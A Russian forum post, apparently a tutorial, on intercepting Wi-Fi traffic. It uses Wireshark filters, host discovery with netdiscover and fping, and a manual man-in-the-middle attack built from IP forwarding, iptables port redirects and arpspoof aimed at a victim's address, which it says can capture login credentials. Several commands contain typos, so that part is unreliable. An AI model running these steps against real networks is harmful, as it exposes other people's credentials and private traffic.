Перейти к публикации
федя

Анализ информации внутри сети WI-Fi

Рекомендованные сообщения

Начнем по порядку.

Установка и запуск WireShark

WireShark - это известная утилита для анализа сетей. Для операционной системы Kali Linux она предоставлена в комплекте с набором основных программ. Есть версия для любителей Windows. Для установки на другие ОС Linux можно воспользоваться такой командой:

sudo atp-get install wireshar

После установки запустим утилиту. Можно запустить с помощью команды:

sudo wireshark
251ec7404c0b5c1e0d175.png
Интерфейс wireshark

Дальше необходимо выбрать один из предложенных интерфейсов и начать анализ трафика. После запуска интерфейс программы будет разделен на три блока.

d6ceaebf3bd55b853f32b.png
Разделения интерфейса после запуска
  1. блок - настройка и управления утилитой.
  2. блок - пакеты, которые были перехвачены.
  3. блок - информация для расшифровки и получения данных с пакетов.

Для тестирования можно открыть браузер и начать заходить на разные сайты, входить в формы авторизации, добавлять картинки и т.д. Потом можно остановить wireshark и посмотреть, какие данные были получены.

Но так как в нашу утилиту попадают тонны трафика, то нужно использовать фильтры:

1. ip.proto - протокол 
2. ip.src - отправитель 
3. ip.dst - получатель 
4. ip.addr - любой адрес

 

 

Фильтры поддерживают использование логических операторов и выражений:

== - присваивание 
|| - логическое или 
& - логическое и 
> - больше 
< - меньше

 

 

На примере можно использовать метод "GET". Введем в поле фильтра запрос "http.request.method == "GET". Находим запись и нажимаем правой кнопкой мыши Follow->TCP Stream. У меня получилось проанализировать пакет, в котором была загружена картинка на хост. Был получен формат, а также другая информация в USEr-Agent. Вот такими способами можно отсеивать не нужную информацию и искать полезные данные в WireShark. Таким способом можно получить авторизационные данные, а также полностью расшифровывать пакеты "telnet".

63972456f62b2a0da1042.png
Пример перехваченного пакета

Сбор информации

Далее нам нужно получить информацию о пользователях. Для этого можно использовать две утилиты netdiscover и fping. Начнем с первой, чтобы быстро получить список активных участников сети можно воспользоваться Nmap или netdiscover, но последний способ быстрее.

sudo netdiscover

После этого получаем информацию об участниках сети.

7fa4dbd48715f1e691c19.png
Участники сети

Если у вас очень много участников в сети, то можно воспользоваться утилитой fping. Для того чтобы просканировать необходимо ввести команду. После этого активные хосты будут отображены в файле:

fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt
0aa28ca3bdee0872366b9.png
Информация об участниках в файле

Эту информацию можно использовать в WireShark. Например, для фильтрации по конкретному IP, можно воспользоваться командой:

ip.addr==192.168.0.100
ded6b7bb06df662c15e6a.png
Фильтрация по IP

Или, например, фильтрация по MAC-адресу:

eth.addr==68:3e:xx:xx:xx:xx
93681fbf6e004b48e99b2.png
Фильтрация по MAC-адресу

Можно комбинировать запросы логическим «или» - ||:

eth.addr==68:3e:xx:xx:xx:xx || igmp
68577f9c26cd6cf0fb60f.png
Комбинирование двух разных запросов

MITM-атака

Это, по сути, процесс, когда вы располагаетесь между роутером и пользователем сети и начинаете слушать все пакеты. Принцип действий хорошо показан на картинке:

dd675ca58acbfdf124db5.png
MITM-атака

Для этих задач есть специальные утилиты, но можно сделать все и ручками. Для этого необходимо сначала включить IP-форвординг и изменить правила iptablex:

sudo cat /proc/sys/net/ipv4/ip_forward #Проверка форвординга пакетов, если -включен, если 0-выключен.

echo "1" > /proc/sys/net/ipv4/ip_forward #Включаем форвординг пакетов 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 80 порта на 8282 

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 443 порта на 8282

 

 

d5893abb491bf8a642fb1.png
 

Далее необходимо запустить команду. Перед этим обязательно запустить WireShark для снифа трафика, чтобы потом его можно было проанализировать:

arpfpoof -i <interface> -t <жертва> <шлюз>

Например, если вы проводите эту атаку в сети и IP нашей цели 192.168.0.100, то команда будет иметь такой вид:

arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1
82f727b1a105b33829ba7.png
 

Далее с фильтрами и другими данными информация анализируется в WireShark.

Заключение

Внимательно относитесь к использованию Wi-Fi в публичных сетях. Возможно, кто-то перехватывает ваш трафик. Поэтому лучшие не использовать недостоверные сети для передачи важных и конфиденциальных данных.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Проще говоря это арбитраж трафика 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.


×
×
  • Создать...